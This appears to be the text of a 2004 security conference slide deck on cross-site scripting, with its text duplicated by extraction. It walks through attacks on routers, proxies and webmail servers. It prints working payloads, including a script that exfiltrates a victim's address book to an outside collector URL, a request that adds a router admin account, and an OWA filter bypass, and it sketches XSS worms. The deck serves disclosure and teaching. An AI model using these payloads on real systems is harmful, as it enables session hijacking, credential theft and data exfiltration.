Not only a XSS

Toni Cortès Martínez Toni Cortès Martínez

Infohacking ResearchInfohacking Research

Not only a XSSNot only a XSS

FIST Conference March 2004

Infohacking Research Not Only a XSS2

GUIDELINEGUIDELINE

GuidelineGuideline IntroductionIntroduction XSS TodayXSS Today Let’s see some XSS Let’s see some XSS


IntroductionIntroduction

What’s this?What’s this? XSS?XSS? How it works?How it works? Where it works?Where it works? Application level security.Application level security. OK, but it’s only a XSS.OK, but it’s only a XSS.


XSSXSS

XSS (common attacks)XSS (common attacks) When somebody can exploit user inputs to get a non expected When somebody can exploit user inputs to get a non expected

response.response. The error it’s usually due to a poor filtering on user inputs and/or The error it’s usually due to a poor filtering on user inputs and/or

on the output from dynamically generated pages.on the output from dynamically generated pages. This could allow access to something restricted to user, for This could allow access to something restricted to user, for

example: session credentials (cookies, session Id’s, etc.)example: session credentials (cookies, session Id’s, etc.)


How it worksHow it works

How it work’sHow it work’s Attacker must trick the victim to make a special HTTP request.Attacker must trick the victim to make a special HTTP request.

Usually exploited on web environment: Usually exploited on web environment: 1) Webmails1) Webmails

2) Web forums2) Web forums3) Any web application (dynamic content) that allows user interaction3) Any web application (dynamic content) that allows user interaction

Other applications that render some output in HTML (log viewers, mail Other applications that render some output in HTML (log viewers, mail clients)clients)“HTML inyection”. (like ILLC techniques)“HTML inyection”. (like ILLC techniques)

Exploits a non secure programming methodology.Exploits a non secure programming methodology. The attacker usually wants the victim to do something:The attacker usually wants the victim to do something:

Sends out some cookie (session or permanent)Sends out some cookie (session or permanent) Make an HTTP request for you ;)Make an HTTP request for you ;)

The goal of XSS: We are on the victim environment.The goal of XSS: We are on the victim environment.


How it worksHow it works

How it works, exampleHow it works, example We found a flaw on a server (ex: online bank with email service)We found a flaw on a server (ex: online bank with email service) Construct a special request to explot this flaw (XSS), and obtain Construct a special request to explot this flaw (XSS), and obtain

user credentials.user credentials. Send a message to the victim (with window.open, img src, etc.)Send a message to the victim (with window.open, img src, etc.) Wait for the user access and get the session track cookie.Wait for the user access and get the session track cookie. Access to the online bank with user credentials (stolen cookie)Access to the online bank with user credentials (stolen cookie) Now we are this user for a few time.Now we are this user for a few time.


Where it worksWhere it works

Where it Works?Where it Works? Any dynamic generated content dependant on user’s input it’s a Any dynamic generated content dependant on user’s input it’s a

potential XSS security hole.potential XSS security hole. Enter your name: ToniEnter your name: Toni Hi ToniHi Toni

Simple example of explotation on a dynamic page:Simple example of explotation on a dynamic page: Enter your name: ToniEnter your name: Toni<script>alert(‘Hello XSS’)</script><script>alert(‘Hello XSS’)</script> Hi ToniHi Toni


Application level securityApplication level security

Nowadays, the application level security is one of the Nowadays, the application level security is one of the computer challenges.computer challenges. Application level firewalls like HIVE or layer 7 filters.Application level firewalls like HIVE or layer 7 filters. Client side security it’s out of control for webmasters.Client side security it’s out of control for webmasters. Servers can only do their best trying to filter any data coming Servers can only do their best trying to filter any data coming

from client side.from client side. Fact: most of the XSS based attacks and vulnerabilities are easy Fact: most of the XSS based attacks and vulnerabilities are easy

to exploit.to exploit. No special skills are needed -> script kiddies.No special skills are needed -> script kiddies. XSS is useful to impersonate a user but doesn’t provide a XSS is useful to impersonate a user but doesn’t provide a

direct or easy way of controlling a computer…umm, well, you direct or easy way of controlling a computer…umm, well, you still can do lot of things ;-)still can do lot of things ;-)


OK, but it’s only a XSS.OK, but it’s only a XSS.

OK, but it’s only a XSS…OK, but it’s only a XSS… Yes, XSS attacks seem to be harmless by itself, but they could open Yes, XSS attacks seem to be harmless by itself, but they could open

other attack vectors.other attack vectors. We can gain access to a web-admin tool.We can gain access to a web-admin tool. (IIS 6.0 Web Admin XSS vulnerability)(IIS 6.0 Web Admin XSS vulnerability)

XSS, breaks with old HTTP session tracking methods: use of ID’s on XSS, breaks with old HTTP session tracking methods: use of ID’s on the URL, cookies and also source IP based authentication. the URL, cookies and also source IP based authentication.

(Iplanet Messaging Server XSS vulnerability) (Iplanet Messaging Server XSS vulnerability)

Combination of XSS with other flaws to launch a more complex Combination of XSS with other flaws to launch a more complex attack:attack:

--HOTMAIL XSS and AV bypass HOTMAIL XSS and AV bypass --Microsoft User Domain Microsoft User Domain Credendials Credendials access via OWA XSSaccess via OWA XSS (via XST) (via XST)

http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/Hotmail/index.htm

http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/OWA/OWA_XSS.htm




XSS TodayXSS Today

XSS todayXSS today XSS, next generation attacks.XSS, next generation attacks. Proof of concept: HTTP redirectionProof of concept: HTTP redirection XSS based worms & trojansXSS based worms & trojans XSS wormXSS worm XSS trojanXSS trojan Anyone could be affected by XSSAnyone could be affected by XSS


XSS Next GenerationXSS Next Generation

XSS next generation attacks. XSS next generation attacks.

HTTP response redirection (information leak)HTTP response redirection (information leak) (Zeus Web Admin XSS)(Zeus Web Admin XSS) HTTP bouncing (Full interactive)HTTP bouncing (Full interactive) … … under construction under construction


HTTP RedirectionHTTP Redirection

Proof of concept: HTTP redirectionProof of concept: HTTP redirection Example of an evil link that steals address book of the victim ‘s webmail:Example of an evil link that steals address book of the victim ‘s webmail: http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){varhttp://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var

%20xmlHttp%20=%20new%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<t%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<target>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.responsarget>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;window.open(“http://www.infohacking.com/data_collector.php?eText;window.open(“http://www.infohacking.com/data_collector.php?response=“+xmlDoc);} pedo();</script>response=“+xmlDoc);} pedo();</script>


HTTP RedirectionHTTP Redirection

Which means:Which means: http://<target>/vulnerable.http://<target>/vulnerable.cgicgi?variable?variable= (server path to script inyection)= (server path to script inyection)

<script><script>function pedo()function pedo(){var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); xmlHttp.open("GET","http://<target>/address_book.cgi",false); xmlHttp.open("GET","http://<target>/address_book.cgi",false); // MAKE REQUEST// MAKE REQUEST

xmlHttp.send();xmlHttp.send();xmlDoc=xmlHttp.responseText; xmlDoc=xmlHttp.responseText; // STORE RESPONSE// STORE RESPONSE

window.open(“http://<attacker_site>/“+xmlDoc);} window.open(“http://<attacker_site>/“+xmlDoc);} // SEND RESPONSE TO ATTACKER// SEND RESPONSE TO ATTACKER

pedo();pedo();</script></script>

Note: we use “window.open” to send response in order to bypass “xmlHttp.open” Note: we use “window.open” to send response in order to bypass “xmlHttp.open” security restrictions.security restrictions.


XSS based worms & trojansXSS based worms & trojans

General “features”General “features” Spreading trough webmail serversSpreading trough webmail servers Self decrypting script routineSelf decrypting script routine Can modify permanent cookies (trojan)Can modify permanent cookies (trojan) Can force session logout (D.o.S.)Can force session logout (D.o.S.) Can impersonate the user Can impersonate the user Can steal information (mail content, address book, etc)Can steal information (mail content, address book, etc) Hard to be detected by AV software (encrypted payload)Hard to be detected by AV software (encrypted payload) If no user action is needed (as XSS on some field of the mail) If no user action is needed (as XSS on some field of the mail)

then the spreading will be very fast!then the spreading will be very fast!


XSS wormXSS worm

How it works:How it works: Once executed, the script will self decrypt and try to detect the Once executed, the script will self decrypt and try to detect the

source (Hotmail, Yahoo, Terra, …) or the webmail software source (Hotmail, Yahoo, Terra, …) or the webmail software (Iplanet, etc). It can be done with a simple “document.URL”, and (Iplanet, etc). It can be done with a simple “document.URL”, and comparing with some patterns.comparing with some patterns.

If the source is knownIf the source is known try to get address book try to get address book Filter only webmail addresses Filter only webmail addresses Auto send routineAuto send routine


XSS trojanXSS trojan

How it works:How it works: Once executed, the script will self decrypt and try to set a Once executed, the script will self decrypt and try to set a

permanent cookie (will be stored on victim’s hard disk)permanent cookie (will be stored on victim’s hard disk) The modified cookie could change some option: it can set The modified cookie could change some option: it can set

Chinese language as default ;-) (D.o.S.)Chinese language as default ;-) (D.o.S.) The modified cookie could redirect the victim to some place on The modified cookie could redirect the victim to some place on

the server that is controlled by the attacker (changing some the server that is controlled by the attacker (changing some profile setting in the cookie)profile setting in the cookie)

As worms, trojan could try to spread away…As worms, trojan could try to spread away…


Anyone can be affected by XSSAnyone can be affected by XSS

Recent example: ViewCVS.py Recent example: ViewCVS.py

Affected sites: Sorceforge.net, Apache.org, Iptables.org.Affected sites: Sorceforge.net, Apache.org, Iptables.org.

Those sites are well known to everybody, are probably they are Those sites are well known to everybody, are probably they are managed by security concerned people…managed by security concerned people…

… … anyway, they still can be exposed to XSS risks…anyway, they still can be exposed to XSS risks…


Sourceforge.netSourceforge.net


Apache.orgApache.org


Iptables.orgIptables.org


XSS ExamplesXSS Examples

Some XSS examples from Infohacking ResearchSome XSS examples from Infohacking Research 3Com 812 ADSL router -> we add a new admin3Com 812 ADSL router -> we add a new admin Inktomi Traffic Server -> all user vulnerables by this XSSInktomi Traffic Server -> all user vulnerables by this XSS Iplanet Messaging Server -> session hijackIplanet Messaging Server -> session hijack Microsoft ISA Server -> Microsoft ISA Server -> OWA XSS -> Access to user credentialsOWA XSS -> Access to user credentials


XSS on 3com ADSL routerXSS on 3com ADSL router

There is a lot of XSS present on the OCR812There is a lot of XSS present on the OCR812 http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_Ihttp://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_I

NJECT_CODE</b>")</script>NJECT_CODE</b>")</script>



With XSS we can insert new users to our routerWith XSS we can insert new users to our router We can use windows.open, or <img src=..> to make our special We can use windows.open, or <img src=..> to make our special

requestrequest //

Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserNForms/admin_telnet_add"+String.fromCharCode(63)+"uumUserName=infohacking&uumUserPassword=ame=infohacking&uumUserPassword=



We can make the complete process if we know IP, user and We can make the complete process if we know IP, user and password (by example, old admin)password (by example, old admin)

<html><html> <img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg"><img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg"> <script type="text/javascript"><script type="text/javascript"> var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP") xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>,false)xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>,false) xmlHttp.setRequestHeader("Authorization:", "Basic xmlHttp.setRequestHeader("Authorization:", "Basic

User:Password(base64 encoded)User:Password(base64 encoded)")") xmlHttp.send()xmlHttp.send() </script></script> </html></html>


Inktomi Traffic Server XSSInktomi Traffic Server XSS

Inktomi Traffic Server is a proxy cache used on several Inktomi Traffic Server is a proxy cache used on several countryes by ISPcountryes by ISP Also know in Spain as “Proxy cache de Telefónica”Also know in Spain as “Proxy cache de Telefónica” A special request by a client passing through the Inktomi Traffic-A special request by a client passing through the Inktomi Traffic-

Server causes an error page generated by the proxy. This Server causes an error page generated by the proxy. This dynamic error page is vulnerable to Cross Site Scripting... dynamic error page is vulnerable to Cross Site Scripting...

Indirectly any server whose clients come trough the Traffic-Indirectly any server whose clients come trough the Traffic-Server and using cookies to track sessions are "vulnerable".Server and using cookies to track sessions are "vulnerable".

The client making the request IS UNABLE to distinguish what The client making the request IS UNABLE to distinguish what domain generated this code... domain generated this code...


Inktomi Traffic Server XSSInktomi Traffic Server XSS

Exploit?Exploit? We test it over 5.5.1 version.We test it over 5.5.1 version. Only need configure a proxy on ANY IP with port 80.Only need configure a proxy on ANY IP with port 80. Make a special request.Make a special request. http://<spoofed_domain>:443/</em><script>alert()</script>http://<spoofed_domain>:443/</em><script>alert()</script>

We can see the script executed on our browser, “generated” by We can see the script executed on our browser, “generated” by the spoofed domain. Now, we can access to cookies, and the spoofed domain. Now, we can access to cookies, and everything, like man in the middle attack.everything, like man in the middle attack.


Iplanet messaging server XSSIplanet messaging server XSS

This webmail, Iplanet messaging server allow us hijack This webmail, Iplanet messaging server allow us hijack the SID.the SID. This server allows "online" opening of file attachments. This This server allows "online" opening of file attachments. This

means that any html file will be opened by the client browser in means that any html file will be opened by the client browser in the IPlanet webmail domain context. Wonderful XSS ;-)the IPlanet webmail domain context. Wonderful XSS ;-)

Now we can explode this XSS with a html Now we can explode this XSS with a html attach.attach.

With document.URL we obtain the SID and userid (located on the With document.URL we obtain the SID and userid (located on the URL)URL)

With the SID, we gain access to all attach.With the SID, we gain access to all attach.http://<iplanet_host>/attach/file.html?http://<iplanet_host>/attach/file.html?

sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX &number=2&filename=file.html&number=2&filename=file.html


Iplanet messaging server XSSIplanet messaging server XSS

But this is not easy…. Iplanet webmail include a IP But this is not easy…. Iplanet webmail include a IP session tracking.session tracking.

When we can use the hijacked SID?When we can use the hijacked SID? If we are near the victim, behind a NAT device, we can access If we are near the victim, behind a NAT device, we can access

with his SID.with his SID. We can stole the session to all people who access trough a We can stole the session to all people who access trough a

transparent proxy (like transparent proxy devices).transparent proxy (like transparent proxy devices). Or we can create a script to force user make request and redirect Or we can create a script to force user make request and redirect

to us. Of course… they don’t see anything… (see above)to us. Of course… they don’t see anything… (see above)

Note: a lot of web server use the same session-cookie on both http and Note: a lot of web server use the same session-cookie on both http and https domains. (This note is for the online bank developers).https domains. (This note is for the online bank developers).


Microsoft ISA Server XSSMicrosoft ISA Server XSS

This example shows an XSS exploited using headers This example shows an XSS exploited using headers When we try to go an unreachable url trought ISA Server. ISA When we try to go an unreachable url trought ISA Server. ISA

generate an error page, showing some data (the content of “via generate an error page, showing some data (the content of “via header”).header”).

We fix this header.We fix this header. Now we can request a non-existent URL into an existent domain.Now we can request a non-existent URL into an existent domain. (usually server use the same cookie on all his domain)(usually server use the same cookie on all his domain) Steal cookies Steal cookies Access.Access. We don’t need a flaw on the server code. Use ISA Server We don’t need a flaw on the server code. Use ISA Server

instead.instead.


ISA Server ExploitISA Server Exploit

<html><body><script type="text/javascript">alert("Click OK then wait for a few seconds...")var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")xmlHttp.open("GET", "http://www.infohacking.com:113", false)xmlHttp.setRequestHeader("Via",

"CODE_INJECTED_IN_VIA_HEADER\<script>alert\(\"ISA_SERVER_XSS_by_INFOHACKING\"\)\<\/script\>")

xmlHttp.send()xmlDoc=xmlHttp.responseText

document.write(xmlHttp.responseText)</script></body></html>


OWA XSSOWA XSS

What we have here?What we have here? With OWA you can see an HTML formatted e-mailWith OWA you can see an HTML formatted e-mail A user must click on a special link for this purpose in the webmail A user must click on a special link for this purpose in the webmail

interface, and an alert will pop-up.interface, and an alert will pop-up. To avoid people executing malicious content in the client To avoid people executing malicious content in the client

browser, the OWA will try to filter the content of the mail.browser, the OWA will try to filter the content of the mail.

Good, but… no Good, but… no enough.enough.


Disabling OWA filteringDisabling OWA filtering

The URL to view an HTML formatted mail is something like this:The URL to view an HTML formatted mail is something like this:http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<suhttp://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<su

bject>.EML/1_multipart/2_text.htm?bject>.EML/1_multipart/2_text.htm?Security=1Security=1

Good name for a parameter, other name maybe “change_this_for_fucking_us”Good name for a parameter, other name maybe “change_this_for_fucking_us”

We only need to quit this parameter, and OWA don’t apply the filter.We only need to quit this parameter, and OWA don’t apply the filter.


OWA XSSOWA XSS

Obtaining data to create our special link.Obtaining data to create our special link. We need IP or hostname of the server, user name and subject.We need IP or hostname of the server, user name and subject. All this we can found on the “referer” header of an HTTP request All this we can found on the “referer” header of an HTTP request

coming from a link in the body of message.coming from a link in the body of message.

Now with referrer, we can send our attack.Now with referrer, we can send our attack. We have the IP or hostname of server (from referrer)We have the IP or hostname of server (from referrer) We have the user name (from referer)We have the user name (from referer) We know the subjectWe know the subject We create a link in the body of message, without the We create a link in the body of message, without the

“security” parameter. (link to the same message without “security” parameter. (link to the same message without security parameter)security parameter)

<img src="http://<site_of_the_attacker"><img src="http://<site_of_the_attacker">


OWA, Stolen credentialsOWA, Stolen credentials

Nothing else? Nothing else? OWA uses cookies to track the HTTP session, but also uses OWA uses cookies to track the HTTP session, but also uses

"Basic Auth" for... more security? ;-)"Basic Auth" for... more security? ;-) This “Basic Auth” (-> base64 encoded user:passwd) contains the This “Basic Auth” (-> base64 encoded user:passwd) contains the

user credentials for this domain.user credentials for this domain. To access the "Basic Auth" header, the easiest way is via an http To access the "Basic Auth" header, the easiest way is via an http

"TRACE" request...and the IIS (Internet Information Server) by "TRACE" request...and the IIS (Internet Information Server) by default will allow those kind of requests.default will allow those kind of requests.


XSSXSS

That’s all folks??That’s all folks??

Of course, as always, imagination of the attacker is the only limit...Of course, as always, imagination of the attacker is the only limit...much more fun is possible.much more fun is possible.

Thanks For Your attention.Thanks For Your attention.

© Toni Cortes Martinez & Hugo Vazquez Carames

Infohacking Research

Barcelona, 7 May 2004

FIST Conference March 2004

Not only a XSSNot only a XSS

Technology

Not only a XSS